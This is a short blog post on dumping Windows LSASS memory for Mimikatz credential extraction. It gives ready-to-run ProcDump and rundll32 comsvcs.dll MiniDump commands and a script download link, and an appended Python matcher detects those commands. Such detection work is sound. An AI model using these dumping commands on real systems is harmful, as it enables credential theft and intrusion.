Tuesday, April 14, 2020

LSASS Dumping Methods (For Mimikatz)


In every attack we need to get the Windows credentials; this is a super important task. We need to target the "LSASS.EXE" process and dump its memory so that we can extract credentials from the dump using Mimikatz.


Here are some of the important methods:

Using ProcDump :

1. The favorite method of dumping is using "procdump.exe". This tool is from Microsoft PsTools.
2. Download ProcDump.exe and upload it to the remote system.
3. Command : "procdump -ma lsass.exe lsass.dmp"


Using VB Script :

Download script from here :
https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp













rundll32 Command :

Essentially, the VB script from the previous method uses the following command to dump the lsass.exe process:

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full

So in case you do not have the VB script with you, you can still fire up the command and dump the LSASS process.
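A defender-side view of the two command lines above, as an added example that is not part of the original post: a small Python matcher that flags process-creation command lines fitting the ProcDump and comsvcs.dll MiniDump patterns. The event tuples, host names and rule labels are constructed for illustration.

```python
import re

# Rules keyed by a label (labels are hypothetical); each covers one command from the post.
RULES = {
    # procdump -ma lsass.exe lsass.dmp  (also procdump64, /ma, full paths)
    "procdump_lsass": re.compile(
        r"procdump(64)?(\.exe)?\s.*[-/]ma\s.*lsass", re.I),
    # rundll32 ...\comsvcs.dll, MiniDump <pid> <file> full
    "comsvcs_minidump": re.compile(
        r"rundll32(\.exe)?\s.*comsvcs(\.dll)?\s*,\s*minidump\s+\d+\s", re.I),
}

def normalize(cmdline):
    """Drop quotes and collapse whitespace so quoting and spacing don't matter."""
    return re.sub(r"\s+", " ", cmdline.replace('"', "").replace("'", "")).strip()

def classify(cmdline):
    """Return the sorted labels of every rule the command line matches."""
    norm = normalize(cmdline)
    return sorted(name for name, rx in RULES.items() if rx.search(norm))

def scan(events):
    """events: iterable of (host, command_line); yield (host, labels, command_line)."""
    for host, cmd in events:
        labels = classify(cmd)
        if labels:
            yield host, labels, cmd

# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    ("WS01", r"procdump -ma lsass.exe lsass.dmp"),
    ("WS02", r'"C:\Tools\procdump64.exe" -accepteula -ma lsass.exe C:\Temp\out.dmp'),
    ("SRV03", r"rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 "
              r"C:\Users\Public\lsass.bin full"),
    ("SRV04", r"RUNDLL32.EXE C:\Windows\System32\comsvcs.dll,MiniDump 640 C:\Temp\x.bin full"),
    ("WS05", r"procdump -ma notepad.exe notepad.dmp"),              # benign: not lsass
    ("WS06", r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"),  # benign: not comsvcs
]

if __name__ == "__main__":
    for host, labels, cmd in scan(SAMPLE_EVENTS):
        print(f"[ALERT] {host} {','.join(labels)} :: {cmd}")
```

Command-line matching is only one signal; pair it with process-access telemetry on lsass.exe (for example Sysmon Event ID 10).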


















